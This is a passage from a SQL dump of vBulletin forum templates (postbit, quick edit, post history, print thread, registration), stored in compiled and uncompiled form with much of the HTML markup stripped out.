    \r\n$template_hook[postbit_end]\r\n\r\n\".(($show[\'profile\']) ? (\" \r\n\r\n\r\n\r\n\") : (\"\")).\"', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"$post[statustitle]\"\r\n $vbphrase[x_until_y]\r\n \r\n \r\n \"$post[statustitle]\"\r\n $post[postdate], $post[posttime]\r\n $post[firstnewinsert]\r\n \r\n \r\n  \r\n #$post[postcount]\r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n \r\n $post[musername]\r\n \r\n \r\n $post[musername]\r\n \r\n
    \r\n\r\n
    $post[usertitle]
    \r\n
    $post[rank]
    \r\n $template_hook[postbit_userinfo_left]\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n  
    \r\n
    $vbphrase[join_date]: $post[joindate]
    \r\n
    $vbphrase[location_perm]: $post[field2]
    \r\n
    $vbphrase[age]: $post[age]
    \r\n
    \r\n $vbphrase[posts]: $post[posts]\r\n
    \r\n $template_hook[postbit_userinfo_right_after_posts]\r\n
    $vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
    \r\n $vbphrase[reppower]: $post[reppower]
    $post[reputationdisplay]
    \r\n $template_hook[postbit_userinfo_right]\r\n
    $post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n $template_hook[postbit_messagearea_start]\r\n \r\n \r\n
    \r\n \"$post[icontitle]\"\r\n $post[title]\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \r\n \r\n
    \r\n __________________
    \r\n $post[signature]\r\n
    \r\n \r\n
    \r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n $vbphrase[last_edited_link_by_x_on_y_at_z_postid]\r\n \r\n $vbphrase[last_edited_by_x_on_y_at_z]\r\n \r\n \r\n $vbphrase[reason]: $post[edit_reason]\r\n \r\n \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n $post[onlinestatus]\r\n \r\n \"<phrase$vbphrase[add_to_xs_reputation]\" border=\"0\" />\r\n \r\n \r\n \"<phrase$vbphrase[add_infraction_for_x]\" border=\"0\" />\r\n \"$vbphrase[report_bad_post]\"\r\n $post[iplogged]\r\n  \r\n \r\n \r\n \r\n \r\n \r\n \r\n \"$vbphrase[loading_editor_please_wait]\"\r\n \"$vbphrase[edit_delete_message]\"\r\n \r\n \r\n \"$vbphrase[forward_message]\"\r\n \r\n \r\n reply_smallquote.gif\" alt=\"$vbphrase[reply_with_quote]\" border=\"0\" />\r\n \r\n \r\n onoff.gif\" alt=\"$vbphrase[multi_quote_this_message]\" border=\"0\" id=\"mq_$post[postid]\" />\r\n \r\n \r\n \"$vbphrase[quick_reply_to_this_message]\"\r\n \r\n \r\n \"$vbphrase[moderated_post]\"\r\n \r\n \r\n \"$vbphrase[spam_post]\"\r\n \r\n \r\n \r\n \"$vbphrase[manage]\"\r\n \r\n \"$vbphrase[deleted_post]\"\r\n \r\n \r\n \r\n \"$vbphrase[received_infraction]\"\r\n \r\n \r\n \"$vbphrase[received_warning]\"\r\n \r\n \r\n $template_hook[postbit_controls]\r\n \r\n
    \r\n$template_hook[postbit_end]\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[postbit_user_popup]\r\n
    $post[username]
    $vbphrase[view_public_profile]
    $vbphrase[send_private_message_to_x]
    $vbphrase[send_email_to_x]
    $vbphrase[visit_xs_homepage]
    $vbphrase[find_more_posts_by_x]
    $vbphrase[add_x_to_contacts]
    \r\n
    \r\n\r\n
    ', 'template', 1280350756, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'), (1526, -1, 'postbit_onlinestatus', '\".(($onlinestatus==0) ? (\"\\\"\"\") : (\"\")).\"\r\n\".(($onlinestatus==1) ? (\"\\\"\"\") : (\"\")).\"\r\n\".(($onlinestatus==2) ? (\"\\\"\"\") : (\"\")).\"', '\"<phrase$vbphrase[x_is_offline]\" border=\"0\" />\r\n\"<phrase$vbphrase[x_is_online_now]\" border=\"0\" />\r\n\"<phrase$vbphrase[x_is_invisible]\" border=\"0\" />', 'template', 1071580897, 'vBulletin Solutions', '', 'vbulletin'), (1527, -1, 'postbit_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'basic_bbcode\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'color_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\'] OR $show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quote_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".((!is_browser(\'opera\')) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".((is_browser(\'ie\')) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'wysiwyg_compatible\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"$vbphrase[remove_text_formatting]\\\"
    \\\"\\\"
    \\\"$vbphrase[bold]\\\"
    \\\"$vbphrase[italic]\\\"
    \\\"$vbphrase[underline]\\\"
    \\\"\\\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"\\\"
    options[\'cleargifurl\'] . \"\\\" id=\\\"{$editorid}_color_bar\\\" alt=\\\"\\\" style=\\\"background-color:black\\\" width=\\\"21\\\" height=\\\"4\\\" />
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[insert_link]\\\"
    \\\"$vbphrase[insert_image]\\\"
    \\\"\\\"
    \\\"$vbphrase[wrap_quote_tags]\\\"
     \\\"\\\"
    \\\"$vbphrase[check_spelling]\\\"
    \r\n
    \\\"$vbphrase[decrease_size]\\\"
    \r\n
    \\\"$vbphrase[increase_size]\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[switch_editor_mode]\\\"
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_message_please_wait]\\\"\r\n \r\n \r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'softdeleteoption\']) ? (\"\r\n
    \r\n \r\n \".(($show[\'physicaldeleteoption\'] AND $show[\'keepattachmentsoption\']) ? (\"()\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[remove_text_formatting]\"
    \"\"
    \"$vbphrase[bold]\"
    \"$vbphrase[italic]\"
    \"$vbphrase[underline]\"
    \"\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"
    \"\"
    \"\"
    \r\n
    \"\"
    \"$vbphrase[insert_link]\"
    \"$vbphrase[insert_image]\"
    \"\"
    \"$vbphrase[wrap_quote_tags]\"
     \"\"
    \"$vbphrase[check_spelling]\"
    \r\n
    \"$vbphrase[decrease_size]\"
    \r\n
    \"$vbphrase[increase_size]\"
    \r\n
    \"\"
    \"$vbphrase[switch_editor_mode]\"
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_message_please_wait]\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n ()\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1237516405, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1528, -1, 'postbit_reputation', '\\\"$post[username]', '\"$post[username]', 'template', 1071580916, 'vBulletin Solutions', '', 'vbulletin'), (1529, -1, 'postbit_wrapper', '\r\n\".(($show[\'spacer\']) ? (\"\r\n $spacer_open\r\n
    \r\n \".((!$post[\'islastshown\']) ? (\"\") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n$postbit\r\n\r\n\".(($show[\'spacer\']) ? (\"\r\n
    \r\n $spacer_close\r\n\") : (\"\")).\"\r\n', '\r\n\r\n $spacer_open\r\n
    \r\n \r\n\r\n\r\n$postbit\r\n\r\n\r\n
    \r\n $spacer_close\r\n
    \r\n', 'template', 1192531778, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1530, -1, 'posthistory', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_edit_history]\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$historybits\r\n\r\n \r\n\r\n
    $vbphrase[post_edit_history]
    $vbphrase[old]$vbphrase[new]$vbphrase[reason_for_editing]$vbphrase[username]$vbphrase[time_of_edit]
    \r\n \r\n
    \r\n\r\n\".(($show[\'comparetable\']) ? (\"\r\n
    \r\n
    \r\n
    $vbphrase[post_comparison]
    \r\n\r\n \".(($show[\'titlecompare\']) ? (\"\r\n
    $vbphrase[title_changes]
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    -$oldtitle
    +$newtitle
    \r\n\r\n
    $vbphrase[text_changes]
    \r\n \") : (\"\")).\"\r\n\r\n \r\n \".(($comparebits) ? (\"\r\n $comparebits\r\n \") : (\"\r\n \r\n \")).\"\r\n
    $vbphrase[must_select_two_version_comparison]
    \r\n
    \r\n\") : (\"\")).\"\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[post_edit_history]\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$historybits\r\n\r\n \r\n\r\n
    $vbphrase[post_edit_history]
    $vbphrase[old]$vbphrase[new]$vbphrase[reason_for_editing]$vbphrase[username]$vbphrase[time_of_edit]
    \r\n \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n
    $vbphrase[post_comparison]
    \r\n\r\n \r\n
    $vbphrase[title_changes]
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    -$oldtitle
    +$newtitle
    \r\n\r\n
    $vbphrase[text_changes]
    \r\n
    \r\n\r\n \r\n \r\n $comparebits\r\n \r\n \r\n \r\n
    $vbphrase[must_select_two_version_comparison]
    \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876572, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1531, -1, 'posthistory_content_changed', '\".(($compare_show[olddata]) ? (\"\r\n\r\n -\r\n $compare_show[olddata]\r\n\r\n\") : (\"\")).\"\r\n\".(($compare_show[newdata]) ? (\"\r\n\r\n +\r\n $compare_show[newdata]\r\n\r\n\") : (\"\")).\"\r\n', '\r\n\r\n -\r\n $compare_show[olddata]\r\n\r\n\r\n\r\n\r\n +\r\n $compare_show[newdata]\r\n\r\n\r\n', 'template', 1194539281, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1532, -1, 'posthistory_content_not_changed', '\r\n  \r\n $compare_show[olddata]\r\n', '\r\n  \r\n $compare_show[olddata]\r\n', 'template', 1194539311, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1533, -1, 'posthistory_listbit', '\r\n \r\n \r\n \".(($history[\'reason\'] != \'\') ? (\"$history[reason]\") : (\"$vbphrase[n_a]\")).\"\r\n session->vars[\'sessionurl\'] . \"u=$history[userid]\\\">$history[username]\r\n $history[strdate] $history[strtime]\r\n\r\n', '\r\n \r\n \r\n $history[reason]$vbphrase[n_a]\r\n $history[username]\r\n $history[strdate] $history[strtime]\r\n\r\n', 'template', 1194539334, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1534, -1, 'posticonbit', '\r\n\r\n', '\r\n\r\n', 'template', 1067721767, 'vBulletin Solutions', '', 'vbulletin'), (1535, -1, 'posticons', '\".(($show[\'posticons\']) ? (\"\r\n \r\n
    \r\n $vbphrase[post_icons]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n $posticonbits\r\n \".(($show[\'addedspan\']) ? (\"\") : (\"\")).\"\r\n \r\n
    $vbphrase[may_choose_icon_for_message]:
     
    \r\n
    \r\n
    \r\n\") : (\"\r\n \r\n\")).\"', '\r\n \r\n
    \r\n $vbphrase[post_icons]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n $posticonbits\r\n \r\n \r\n
    $vbphrase[may_choose_icon_for_message]:
     
    \r\n
    \r\n
    \r\n\r\n \r\n
    ', 'template', 1223460202, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1536, -1, 'printthread', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\noptions[\'templateversion\'] . \"\\\" />\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $threadinfo[prefix_plain_html] $threadinfo[title]\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    options[\'bburl\'] . \"/\\\">\\\"\"options[\'bbtitle\'] . \"\\\" border=\\\"0\\\" />\r\n
    $pagenav
    \r\n \".(($show[\'pagenav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" accesskey=\\\"1\\\">\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n (\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php)\r\n
    \r\n
    \r\n -   $foruminfo[title]\r\n (\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/forumdisplay.php?f=$foruminfo[forumid])\r\n
    \r\n
    \r\n -   -   $threadinfo[prefix_rich] $threadinfo[title]\r\n (\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/showthread.php?t=$threadid)\r\n
    \r\n\r\n
    \r\n\r\n$postbits\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]\r\n
    $pagenav
    \r\n \".(($show[\'pagenav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n

    \r\n $vbphrase[powered_by_vbulletin]\r\n
    \r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n

    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\n\r\n$vboptions[bbtitle] - $threadinfo[prefix_plain_html] $threadinfo[title]\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \"$vboptions[bbtitle]\"\r\n
    $pagenav
    \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $vboptions[bbtitle]\r\n ($vboptions[bburl]/$vboptions[forumhome].php)\r\n
    \r\n
    \r\n -   $foruminfo[title]\r\n ($vboptions[bburl]/forumdisplay.php?f=$foruminfo[forumid])\r\n
    \r\n
    \r\n -   -   $threadinfo[prefix_rich] $threadinfo[title]\r\n ($vboptions[bburl]/showthread.php?t=$threadid)\r\n
    \r\n\r\n
    \r\n\r\n$postbits\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]\r\n
    $pagenav
    \r\n \r\n \r\n \r\n
    \r\n\r\n

    \r\n $vbphrase[powered_by_vbulletin]\r\n
    \r\n $vboptions[copyrighttext]\r\n

    \r\n\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1537, -1, 'printthreadbit', '\r\n\r\n \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    $post[username]$post[postdate] $post[posttime]
    \r\n\r\n
    \r\n\r\n \".(($post[\'title\']) ? (\"\r\n
    $post[title]
     
    \r\n \") : (\"\")).\"\r\n \".(($post[\'attach\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[x_attachments]\", \"$post[attach]\") . \"
    \r\n \") : (\"\")).\"\r\n\r\n
    $post[message]
    \r\n
    \r\n
    ', '\r\n\r\n \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    $post[username]$post[postdate] $post[posttime]
    \r\n\r\n
    \r\n\r\n \r\n
    $post[title]
     
    \r\n
    \r\n \r\n
    $vbphrase[x_attachments]
    \r\n
    \r\n\r\n
    $post[message]
    \r\n
    \r\n
    ', 'template', 1070145486, 'vBulletin Solutions', '', 'vbulletin'), (1538, -1, 'printthreadbit_ignore', '\r\n\r\n \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    $post[username]$post[postdate] $post[posttime]
    \r\n\r\n
    \r\n\r\n \".(($show[\'adminignore\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$post[username]\") . \"\r\n
    \r\n \") : (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$post[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
    \r\n \")).\"\r\n
    \r\n
    ', '\r\n\r\n \r\n\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    $post[username]$post[postdate] $post[posttime]
    \r\n\r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrator_decided_x_quiet]\r\n
    \r\n \r\n
    \r\n $vbphrase[message_hidden_x_on_ignore_list]\r\n
    \r\n
    \r\n
    \r\n
    ', 'template', 1196095562, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1539, -1, 'register', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'coppa\']) ? (\"$vbphrase[coppa] \") : (\"\")).\"$vbphrase[registration]\r\n\r\n\r\n\r\n$header\r\n\r\n
    \r\n\r\n\".(($show[\'coppa\']) ? (\"\r\n
    $vbphrase[until_receive_signed_form]
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occurred_during_registration]
      $errorlist
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\".((!$show[\'birthday\']) ? (\"\r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'coppa\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \" . construct_phrase(\"$vbphrase[register_at_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
    \r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[to_post_must_first_register]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n
    \r\n\r\n
    \r\n $vbphrase[username]:
    \r\n options[\'maxuserlength\'] . \"\\\" value=\\\"$username\\\" />options[\'cleargifurl\'] . \"\\\" id=\\\"reg_verif_image\\\" onclick=\\\"return toggle_collapse(\'dialog_box\')\\\" style=\\\"display:none;\\\" alt=\\\"\\\" />\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[password]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[enter_password_for_account]
    \r\n $vbphrase[password]:
    \r\n \r\n
    \r\n $vbphrase[confirm_password]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_address]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'coppa\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[enter_valid_email_address]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    \r\n $vbphrase[confirm_email_address]:
    \r\n \r\n
    $vbphrase[if_under_13_provide_parent]
    \r\n $vbphrase[parent_guardian_email]:
    \r\n \r\n
    \r\n
    \r\n\r\n $human_verify\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\".(($show[\'customfields_profile\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_required_information_profile]
    \r\n
    \r\n
    \r\n\r\n $customfields_profile\r\n\r\n \".(($show[\'birthday\']) ? (\"$birthdayfields\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'customfields_option\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_required_information_option]
    \r\n
    \r\n
    \r\n\r\n $customfields_option\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_information]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'referrer\']) ? (\"\r\n
    \r\n $vbphrase[referrer]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[if_referred_enter_name]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
    \r\n $vbphrase[referrer]:
    \r\n
    options[\'maxuserlength\'] . \"\\\" />
    \r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $timezoneoptions\r\n\r\n
    \r\n $vbphrase[receive_email]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'email\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n $vbphrase[administrators_may_send_email]\r\n
    $vbphrase[allow_members_send_you_email]
    \r\n
    \r\n\r\n\r\n $customfields_other\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$vboptions[bbtitle] - <if condition=\"$show[\'coppa\']\">$vbphrase[coppa] </if>$vbphrase[registration]\r\n\r\n\r\n\r\n$header\r\n\r\n
    \r\n\r\n\r\n
    $vbphrase[until_receive_signed_form]
    \r\n
    \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occurred_during_registration]
      $errorlist
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[register_at_x]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[to_post_must_first_register]\r\n
    \r\n\r\n
    \r\n $vbphrase[username]:
    \r\n \"\"\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[password]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[enter_password_for_account]
    \r\n $vbphrase[password]:
    \r\n \r\n
    \r\n $vbphrase[confirm_password]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_address]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[enter_valid_email_address]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    \r\n $vbphrase[confirm_email_address]:
    \r\n \r\n
    $vbphrase[if_under_13_provide_parent]
    \r\n $vbphrase[parent_guardian_email]:
    \r\n \r\n
    \r\n
    \r\n\r\n $human_verify\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_required_information_profile]
    \r\n
    \r\n
    \r\n\r\n $customfields_profile\r\n\r\n $birthdayfields\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_required_information_option]
    \r\n
    \r\n
    \r\n\r\n $customfields_option\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[additional_information]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[referrer]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[if_referred_enter_name]
    \r\n $vbphrase[referrer]:
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n $timezoneoptions\r\n\r\n
    \r\n $vbphrase[receive_email]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[administrators_may_send_email]\r\n
    $vbphrase[allow_members_send_you_email]
    \r\n
    \r\n\r\n\r\n $customfields_other\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
